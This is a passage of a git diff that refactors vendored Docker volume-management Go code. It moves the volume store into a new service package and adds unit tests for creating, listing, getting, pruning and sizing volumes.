s.vs.Create(ctx, name, driverName, opts...) + if err != nil { + return nil, err + } + + s.eventLogger.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) + apiV := volumeToAPIType(v) + return &apiV, nil +} + +// Get gets a volume +func (s *VolumesService) Get(ctx context.Context, name string, getOpts ...opts.GetOption) (*types.Volume, error) { + v, err := s.vs.Get(ctx, name, getOpts...) + if err != nil { + return nil, err + } + vol := volumeToAPIType(v) + + var cfg opts.GetConfig + for _, o := range getOpts { + o(&cfg) + } + + if cfg.ResolveStatus { + vol.Status = v.Status() + } + return &vol, nil +} + +// Mount mounts the volume +func (s *VolumesService) Mount(ctx context.Context, vol *types.Volume, ref string) (string, error) { + v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver)) + if err != nil { + if IsNotExist(err) { + err = errdefs.NotFound(err) + } + return "", err + } + return v.Mount(ref) +} + +// Unmount unmounts the volume. +// Note that depending on the implementation, the volume may still be mounted due to other resources using it. +func (s *VolumesService) Unmount(ctx context.Context, vol *types.Volume, ref string) error { + v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver)) + if err != nil { + if IsNotExist(err) { + err = errdefs.NotFound(err) + } + return err + } + return v.Unmount(ref) +} + +// Release releases a volume reference +func (s *VolumesService) Release(ctx context.Context, name string, ref string) error { + return s.vs.Release(ctx, name, ref) +} + +// Remove removes a volume +func (s *VolumesService) Remove(ctx context.Context, name string, rmOpts ...opts.RemoveOption) error { + var cfg opts.RemoveConfig + for _, o := range rmOpts { + o(&cfg) + } + + v, err := s.vs.Get(ctx, name) + if err != nil { + if IsNotExist(err) && cfg.PurgeOnError { + return nil + } + return err + } + + err = s.vs.Remove(ctx, v, rmOpts...) + if IsNotExist(err) { + err = nil + } else if IsInUse(err) { + err = errdefs.Conflict(err) + } else if IsNotExist(err) && cfg.PurgeOnError { + err = nil + } + + if err == nil { + s.eventLogger.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + } + return err +} + +var acceptedPruneFilters = map[string]bool{ + "label": true, + "label!": true, +} + +var acceptedListFilters = map[string]bool{ + "dangling": true, + "name": true, + "driver": true, + "label": true, +} + +// LocalVolumesSize gets all local volumes and fetches their size on disk +// Note that this intentionally skips volumes which have mount options. Typically +// volumes with mount options are not really local even if they are using the +// local driver. +func (s *VolumesService) LocalVolumesSize(ctx context.Context) ([]*types.Volume, error) { + ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + return ok && len(dv.Options()) == 0 + }))) + if err != nil { + return nil, err + } + return s.volumesToAPI(ctx, ls, calcSize(true)), nil +} + +// Prune removes (local) volumes which match the past in filter arguments. +// Note that this intentionally skips volumes with mount options as there would +// be no space reclaimed in this case. +func (s *VolumesService) Prune(ctx context.Context, filter filters.Args) (*types.VolumesPruneReport, error) { + if !atomic.CompareAndSwapInt32(&s.pruneRunning, 0, 1) { + return nil, errdefs.Conflict(errors.New("a prune operation is already running")) + } + defer atomic.StoreInt32(&s.pruneRunning, 0) + + by, err := filtersToBy(filter, acceptedPruneFilters) + if err != nil { + return nil, err + } + ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), ByReferenced(false), by, CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + return ok && len(dv.Options()) == 0 + }))) + if err != nil { + return nil, err + } + + rep := &types.VolumesPruneReport{VolumesDeleted: make([]string, 0, len(ls))} + for _, v := range ls { + select { + case <-ctx.Done(): + err := ctx.Err() + if err == context.Canceled { + err = nil + } + return rep, err + default: + } + + vSize, err := directory.Size(ctx, v.Path()) + if err != nil { + logrus.WithField("volume", v.Name()).WithError(err).Warn("could not determine size of volume") + } + if err := s.vs.Remove(ctx, v); err != nil { + logrus.WithError(err).WithField("volume", v.Name()).Warnf("Could not determine size of volume") + continue + } + rep.SpaceReclaimed += uint64(vSize) + rep.VolumesDeleted = append(rep.VolumesDeleted, v.Name()) + } + return rep, nil +} + +// List gets the list of volumes which match the past in filters +// If filters is nil or empty all volumes are returned. +func (s *VolumesService) List(ctx context.Context, filter filters.Args) (volumesOut []*types.Volume, warnings []string, err error) { + by, err := filtersToBy(filter, acceptedListFilters) + if err != nil { + return nil, nil, err + } + + volumes, warnings, err := s.vs.Find(ctx, by) + if err != nil { + return nil, nil, err + } + + return s.volumesToAPI(ctx, volumes, useCachedPath(true)), warnings, nil +} + +// Shutdown shuts down the image service and dependencies +func (s *VolumesService) Shutdown() error { + return s.vs.Shutdown() +} diff --git a/vendor/github.com/docker/docker/volume/service/service_linux_test.go b/vendor/github.com/docker/docker/volume/service/service_linux_test.go new file mode 100644 index 0000000000..ae70d7e2c5 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service_linux_test.go @@ -0,0 +1,66 @@ +package service + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/service/opts" + "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestLocalVolumeSize(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(dir) + + l, err := local.New(dir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) + assert.Assert(t, err) + assert.Assert(t, ds.Register(l, volume.DefaultDriverName)) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("fake"), "fake")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + + ctx := context.Background() + v1, err := service.Create(ctx, "test1", volume.DefaultDriverName, opts.WithCreateReference("foo")) + assert.Assert(t, err) + v2, err := service.Create(ctx, "test2", volume.DefaultDriverName) + assert.Assert(t, err) + _, err = service.Create(ctx, "test3", "fake") + assert.Assert(t, err) + + data := make([]byte, 1024) + err = ioutil.WriteFile(filepath.Join(v1.Mountpoint, "data"), data, 0644) + assert.Assert(t, err) + err = ioutil.WriteFile(filepath.Join(v2.Mountpoint, "data"), data[:1], 0644) + assert.Assert(t, err) + + ls, err := service.LocalVolumesSize(ctx) + assert.Assert(t, err) + assert.Assert(t, is.Len(ls, 2)) + + for _, v := range ls { + switch v.Name { + case "test1": + assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data)))) + assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(1))) + case "test2": + assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data[:1])))) + assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(0))) + default: + t.Fatalf("got unexpected volume: %+v", v) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/service/service_test.go b/vendor/github.com/docker/docker/volume/service/service_test.go new file mode 100644 index 0000000000..870d19f8a0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service_test.go @@ -0,0 +1,253 @@ +package service + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestServiceCreate(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + + ctx := context.Background() + service, cleanup := newTestService(t, ds) + defer cleanup() + + _, err := service.Create(ctx, "v1", "notexist") + assert.Assert(t, errdefs.IsNotFound(err), err) + + v, err := service.Create(ctx, "v1", "d1") + assert.Assert(t, err) + + vCopy, err := service.Create(ctx, "v1", "d1") + assert.Assert(t, err) + assert.Assert(t, is.DeepEqual(v, vCopy)) + + _, err = service.Create(ctx, "v1", "d2") + assert.Check(t, IsNameConflict(err), err) + assert.Check(t, errdefs.IsConflict(err), err) + + assert.Assert(t, service.Remove(ctx, "v1")) + _, err = service.Create(ctx, "v1", "d2") + assert.Assert(t, err) + _, err = service.Create(ctx, "v1", "d2") + assert.Assert(t, err) + +} + +func TestServiceList(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + + ctx := context.Background() + + _, err := service.Create(ctx, "v1", "d1") + assert.Assert(t, err) + _, err = service.Create(ctx, "v2", "d1") + assert.Assert(t, err) + _, err = service.Create(ctx, "v3", "d2") + assert.Assert(t, err) + + ls, _, err := service.List(ctx, filters.NewArgs(filters.Arg("driver", "d1"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 2)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "notexist"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 3)) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + + _, err = service.Get(ctx, "v1", opts.WithGetReference("foo")) + assert.Assert(t, err) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 2)) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"), filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"), filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) +} + +func TestServiceRemove(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + _, err := service.Create(ctx, "test", "d1") + assert.Assert(t, err) + + assert.Assert(t, service.Remove(ctx, "test")) + assert.Assert(t, service.Remove(ctx, "test", opts.WithPurgeOnError(true))) +} + +func TestServiceGet(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + v, err := service.Get(ctx, "notexist") + assert.Assert(t, IsNotExist(err)) + assert.Check(t, v == nil) + + created, err := service.Create(ctx, "test", "d1") + assert.Assert(t, err) + assert.Assert(t, created != nil) + + v, err = service.Get(ctx, "test") + assert.Assert(t, err) + assert.Assert(t, is.DeepEqual(created, v)) + + v, err = service.Get(ctx, "test", opts.WithGetResolveStatus) + assert.Assert(t, err) + assert.Assert(t, is.Len(v.Status, 1), v.Status) + + v, err = service.Get(ctx, "test", opts.WithGetDriver("notarealdriver")) + assert.Assert(t, errdefs.IsConflict(err), err) + v, err = service.Get(ctx, "test", opts.WithGetDriver("d1")) + assert.Assert(t, err == nil) + assert.Assert(t, is.DeepEqual(created, v)) + + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + v, err = service.Get(ctx, "test", opts.WithGetDriver("d2")) + assert.Assert(t, errdefs.IsConflict(err), err) +} + +func TestServicePrune(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver(volume.DefaultDriverName), volume.DefaultDriverName)) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("other"), "other")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + _, err := service.Create(ctx, "test", volume.DefaultDriverName) + assert.Assert(t, err) + _, err = service.Create(ctx, "test2", "other") + assert.Assert(t, err) + + pr, err := service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + + _, err = service.Get(ctx, "test") + assert.Assert(t, IsNotExist(err), err) + + v, err := service.Get(ctx, "test2") + assert.Assert(t, err) + assert.Assert(t, is.Equal(v.Driver, "other")) + + _, err = service.Create(ctx, "test", volume.DefaultDriverName) + assert.Assert(t, err) + + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + v, err = service.Get(ctx, "test2") + assert.Assert(t, err) + assert.Assert(t, is.Equal(v.Driver, "other")) + + _, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": ""})) + assert.Assert(t, err) + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + + _, err = service.Create(ctx, "test3", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": "split"})) + assert.Assert(t, err) + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana=split"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana=split"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test3")) + + v, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateReference(t.Name())) + assert.Assert(t, err) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + assert.Assert(t, service.Release(ctx, v.Name, t.Name())) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) +} + +func newTestService(t *testing.T, ds *volumedrivers.Store) (*VolumesService, func()) { + t.Helper() + + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + + store, err := NewStore(dir, ds) + assert.Assert(t, err) + s := &VolumesService{vs: store, eventLogger: dummyEventLogger{}} + return s, func() { + assert.Check(t, s.Shutdown()) + assert.Check(t, os.RemoveAll(dir)) + } +} + +type dummyEventLogger struct{} + +func (dummyEventLogger) LogVolumeEvent(_, _ string, _ map[string]string) {} diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/service/store.go similarity index 51% rename from vendor/github.com/docker/docker/volume/store/store.go rename to vendor/github.com/docker/docker/volume/service/store.go index 38afd86f45..e7e9d8a320 100644 --- a/vendor/github.com/docker/docker/volume/store/store.go +++ b/vendor/github.com/docker/docker/volume/service/store.go @@ -1,19 +1,25 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( + "context" + "fmt" "net" "os" "path/filepath" + "runtime" "sync" "time" "github.com/pkg/errors" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/locker" "github.com/docker/docker/volume" "github.com/docker/docker/volume/drivers" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/docker/volume/service/opts" + "github.com/sirupsen/logrus" ) const ( @@ -28,7 +34,10 @@ type volumeWrapper struct { } func (v volumeWrapper) Options() map[string]string { - options := map[string]string{} + if v.options == nil { + return nil + } + options := make(map[string]string, len(v.options)) for key, value := range v.options { options[key] = value } @@ -36,7 +45,15 @@ func (v volumeWrapper) Options() map[string]string { } func (v volumeWrapper) Labels() map[string]string { - return v.labels + if v.labels == nil { + return nil + } + + labels := make(map[string]string, len(v.labels)) + for key, value := range v.labels { + labels[key] = value + } + return labels } func (v volumeWrapper) Scope() string { @@ -52,28 +69,26 @@ func (v volumeWrapper) CachedPath() string { return v.Volume.Path() } -// New initializes a VolumeStore to keep -// reference counting of volumes in the system. -func New(rootPath string) (*VolumeStore, error) { +// NewStore creates a new volume store at the given path +func NewStore(rootPath string, drivers *drivers.Store) (*VolumeStore, error) { vs := &VolumeStore{ locks: &locker.Locker{}, names: make(map[string]volume.Volume), - refs: make(map[string][]string), + refs: make(map[string]map[string]struct{}), labels: make(map[string]map[string]string), options: make(map[string]map[string]string), + drivers: drivers, } if rootPath != "" { // initialize metadata store volPath := filepath.Join(rootPath, volumeDataDir) - if err := os.MkdirAll(volPath, 750); err != nil { + if err := os.MkdirAll(volPath, 0750); err != nil { return nil, err } - dbPath := filepath.Join(volPath, "metadata.db") - var err error - vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second}) + vs.db, err = bolt.Open(filepath.Join(volPath, "metadata.db"), 0600, &bolt.Options{Timeout: 1 * time.Second}) if err != nil { return nil, errors.Wrap(err, "error while opening volume store metadata database") } @@ -102,31 +117,59 @@ func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) { } func (s *VolumeStore) setNamed(v volume.Volume, ref string) { + name := v.Name() + s.globalLock.Lock() - s.names[v.Name()] = v + s.names[name] = v if len(ref) > 0 { - s.refs[v.Name()] = append(s.refs[v.Name()], ref) + if s.refs[name] == nil { + s.refs[name] = make(map[string]struct{}) + } + s.refs[name][ref] = struct{}{} } s.globalLock.Unlock() } +// hasRef returns true if the given name has at least one ref. +// Callers of this function are expected to hold the name lock. +func (s *VolumeStore) hasRef(name string) bool { + s.globalLock.RLock() + l := len(s.refs[name]) + s.globalLock.RUnlock() + return l > 0 +} + // getRefs gets the list of refs for a given name // Callers of this function are expected to hold the name lock. func (s *VolumeStore) getRefs(name string) []string { s.globalLock.RLock() - refs := s.refs[name] - s.globalLock.RUnlock() + defer s.globalLock.RUnlock() + + refs := make([]string, 0, len(s.refs[name])) + for r := range s.refs[name] { + refs = append(refs, r) + } + return refs } -// Purge allows the cleanup of internal data on docker in case +// purge allows the cleanup of internal data on docker in case // the internal data is out of sync with volumes driver plugins. -func (s *VolumeStore) Purge(name string) { +func (s *VolumeStore) purge(ctx context.Context, name string) error { s.globalLock.Lock() + defer s.globalLock.Unlock() + + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + v, exists := s.names[name] if exists { - if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil { - logrus.Error("Error dereferencing volume driver: %v", err) + driverName := v.DriverName() + if _, err := s.drivers.ReleaseDriver(driverName); err != nil { + logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver") } } if err := s.removeMeta(name); err != nil { @@ -136,21 +179,22 @@ func (s *VolumeStore) Purge(name string) { delete(s.refs, name) delete(s.labels, name) delete(s.options, name) - s.globalLock.Unlock() + return nil } // VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts type VolumeStore struct { // locks ensures that only one action is being performed on a particular volume at a time without locking the entire store // since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes. - locks *locker.Locker + locks *locker.Locker + drivers *drivers.Store // globalLock is used to protect access to mutable structures used by the store object globalLock sync.RWMutex // names stores the volume name -> volume relationship. // This is used for making lookups faster so we don't have to probe all drivers names map[string]volume.Volume // refs stores the volume name and the list of things referencing it - refs map[string][]string + refs map[string]map[string]struct{} // labels stores volume labels for each volume labels map[string]map[string]string // options stores volume options for each volume @@ -158,18 +202,141 @@ type VolumeStore struct { db *bolt.DB } -// List proxies to all registered volume drivers to get the full list of volumes +func filterByDriver(names []string) filterFunc { + return func(v volume.Volume) bool { + for _, name := range names { + if name == v.DriverName() { + return true + } + } + return false + } +} + +func (s *VolumeStore) byReferenced(referenced bool) filterFunc { + return func(v volume.Volume) bool { + return s.hasRef(v.Name()) == referenced + } +} + +func (s *VolumeStore) filter(ctx context.Context, vols *[]volume.Volume, by By) (warnings []string, err error) { + // note that this specifically does not support the `FromList` By type. + switch f := by.(type) { + case nil: + if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return warnings, err + } + *vols = ls + } + case byDriver: + if *vols != nil { + filter(vols, filterByDriver([]string(f))) + return nil, nil + } + var ls []volume.Volume + ls, warnings, err = s.list(ctx, []string(f)...) + if err != nil { + return nil, err + } + *vols = ls + case ByReferenced: + // TODO(@cpuguy83): It would be nice to optimize this by looking at the list + // of referenced volumes, however the locking strategy makes this difficult + // without either providing inconsistent data or deadlocks. + if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return nil, err + } + *vols = ls + } + filter(vols, s.byReferenced(bool(f))) + case andCombinator: + for _, by := range f { + w, err := s.filter(ctx, vols, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + } + case orCombinator: + for _, by := range f { + switch by.(type) { + case byDriver: + var ls []volume.Volume + w, err := s.filter(ctx, &ls, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + default: + ls, w, err := s.list(ctx) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + w, err = s.filter(ctx, &ls, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + *vols = append(*vols, ls...) + } + } + unique(vols) + case CustomFilter: + if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return nil, err + } + *vols = ls + } + filter(vols, filterFunc(f)) + default: + return nil, errdefs.InvalidParameter(errors.Errorf("unsupported filter: %T", f)) + } + return warnings, nil +} + +func unique(ls *[]volume.Volume) { + names := make(map[string]bool, len(*ls)) + filter(ls, func(v volume.Volume) bool { + if names[v.Name()] { + return false + } + names[v.Name()] = true + return true + }) +} + +// Find lists volumes filtered by the past in filter. // If a driver returns a volume that has name which conflicts with another volume from a different driver, // the first volume is chosen and the conflicting volume is dropped. -func (s *VolumeStore) List() ([]volume.Volume, []string, error) { - vols, warnings, err := s.list() +func (s *VolumeStore) Find(ctx context.Context, by By) (vols []volume.Volume, warnings []string, err error) { + logrus.WithField("ByType", fmt.Sprintf("%T", by)).WithField("ByValue", fmt.Sprintf("%+v", by)).Debug("VolumeStore.Find") + switch f := by.(type) { + case nil, orCombinator, andCombinator, byDriver, ByReferenced, CustomFilter: + warnings, err = s.filter(ctx, &vols, by) + case fromList: + warnings, err = s.filter(ctx, f.ls, f.by) + default: + // Really shouldn't be possible, but makes sure that any new By's are added to this check. + err = errdefs.InvalidParameter(errors.Errorf("unsupported filter type: %T", f)) + } if err != nil { return nil, nil, &OpErr{Err: err, Op: "list"} } + var out []volume.Volume for _, v := range vols { - name := normaliseVolumeName(v.Name()) + name := normalizeVolumeName(v.Name()) s.locks.Lock(name) storedV, exists := s.getNamed(name) @@ -187,26 +354,59 @@ func (s *VolumeStore) List() ([]volume.Volume, []string, error) { return out, warnings, nil } +type filterFunc func(volume.Volume) bool + +func filter(vols *[]volume.Volume, fn filterFunc) { + var evict []int + for i, v := range *vols { + if !fn(v) { + evict = append(evict, i) + } + } + + for n, i := range evict { + copy((*vols)[i-n:], (*vols)[i-n+1:]) + (*vols)[len(*vols)-1] = nil + *vols = (*vols)[:len(*vols)-1] + } +} + // list goes through each volume driver and asks for its list of volumes. -func (s *VolumeStore) list() ([]volume.Volume, []string, error) { +// TODO(@cpuguy83): plumb context through +func (s *VolumeStore) list(ctx context.Context, driverNames ...string) ([]volume.Volume, []string, error) { var ( - ls []volume.Volume + ls = []volume.Volume{} // do not return a nil value as this affects filtering warnings []string ) - drivers, err := volumedrivers.GetAllDrivers() + var dls []volume.Driver + + all, err := s.drivers.GetAllDrivers() if err != nil { return nil, nil, err } + if len(driverNames) == 0 { + dls = all + } else { + idx := make(map[string]bool, len(driverNames)) + for _, name := range driverNames { + idx[name] = true + } + for _, d := range all { + if idx[d.Name()] { + dls = append(dls, d) + } + } + } type vols struct { vols []volume.Volume err error driverName string } - chVols := make(chan vols, len(drivers)) + chVols := make(chan vols, len(dls)) - for _, vd := range drivers { + for _, vd := range dls { go func(d volume.Driver) { vs, err := d.List() if err != nil { @@ -224,13 +424,12 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) { } badDrivers := make(map[string]struct{}) - for i := 0; i < len(drivers); i++ { + for i := 0; i < len(dls); i++ { vs := <-chVols if vs.err != nil { warnings = append(warnings, vs.err.Error()) badDrivers[vs.driverName] = struct{}{} - logrus.Warn(vs.err) } ls = append(ls, vs.vols...) } @@ -247,28 +446,37 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) { return ls, warnings, nil } -// CreateWithRef creates a volume with the given name and driver and stores the ref -// This ensures there's no race between creating a volume and then storing a reference. -func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) { - name = normaliseVolumeName(name) +// Create creates a volume with the given name and driver +// If the volume needs to be created with a reference to prevent race conditions +// with volume cleanup, make sure to use the `CreateWithReference` option. +func (s *VolumeStore) Create(ctx context.Context, name, driverName string, createOpts ...opts.CreateOption) (volume.Volume, error) { + var cfg opts.CreateConfig + for _, o := range createOpts { + o(&cfg) + } + + name = normalizeVolumeName(name) s.locks.Lock(name) defer s.locks.Unlock(name) - v, err := s.create(name, driverName, opts, labels) + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } + + v, err := s.create(ctx, name, driverName, cfg.Options, cfg.Labels) if err != nil { + if _, ok := err.(*OpErr); ok { + return nil, err + } return nil, &OpErr{Err: err, Name: name, Op: "create"} } - s.setNamed(v, ref) + s.setNamed(v, cfg.Reference) return v, nil } -// Create creates a volume with the given name and driver. -// This is just like CreateWithRef() except we don't store a reference while holding the lock. -func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { - return s.CreateWithRef(name, driverName, "", opts, labels) -} - // checkConflict checks the local cache for name collisions with the passed in name, // for existing volumes with the same name but in a different driver. // This is used by `Create` as a best effort to prevent name collisions for volumes. @@ -282,7 +490,7 @@ func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]st // TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially // use a connect timeout for this kind of check to ensure we aren't blocking for a // long time. -func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) { +func (s *VolumeStore) checkConflict(ctx context.Context, name, driverName string) (volume.Volume, error) { // check the local cache v, _ := s.getNamed(name) if v == nil { @@ -294,7 +502,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err if driverName != "" { // Retrieve canonical driver name to avoid inconsistencies (for example // "plugin" vs. "plugin:latest") - vd, err := volumedrivers.GetDriver(driverName) + vd, err := s.drivers.GetDriver(driverName) if err != nil { return nil, err } @@ -306,7 +514,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err // let's check if the found volume ref // is stale by checking with the driver if it still exists - exists, err := volumeExists(v) + exists, err := volumeExists(ctx, s.drivers, v) if err != nil { return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err) } @@ -318,21 +526,21 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err return v, nil } - if len(s.getRefs(v.Name())) > 0 { + if s.hasRef(v.Name()) { // Containers are referencing this volume but it doesn't seem to exist anywhere. // Return a conflict error here, the user can fix this with `docker volume rm -f` return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName) } // doesn't exist, so purge it from the cache - s.Purge(name) + s.purge(ctx, name) return nil, nil } // volumeExists returns if the volume is still present in the driver. // An error is returned if there was an issue communicating with the driver. -func volumeExists(v volume.Volume) (bool, error) { - exists, err := lookupVolume(v.DriverName(), v.Name()) +func volumeExists(ctx context.Context, store *drivers.Store, v volume.Volume) (bool, error) { + exists, err := lookupVolume(ctx, store, v.DriverName(), v.Name()) if err != nil { return false, err } @@ -345,51 +553,61 @@ func volumeExists(v volume.Volume) (bool, error) { // for the given volume name, an error is returned after checking if the reference is stale. // If the reference is stale, it will be purged and this create can continue. // It is expected that callers of this function hold any necessary locks. -func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { +func (s *VolumeStore) create(ctx context.Context, name, driverName string, opts, labels map[string]string) (volume.Volume, error) { // Validate the name in a platform-specific manner - valid, err := volume.IsVolumeNameValid(name) + + // volume name validation is specific to the host os and not on container image + // windows/lcow should have an equivalent volumename validation logic so we create a parser for current host OS + parser := volumemounts.NewParser(runtime.GOOS) + err := parser.ValidateVolumeName(name) if err != nil { return nil, err } - if !valid { - return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"} - } - v, err := s.checkConflict(name, driverName) + v, err := s.checkConflict(ctx, name, driverName) if err != nil { return nil, err } if v != nil { - return v, nil + // there is an existing volume, if we already have this stored locally, return it. + // TODO: there could be some inconsistent details such as labels here + if vv, _ := s.getNamed(v.Name()); vv != nil { + return 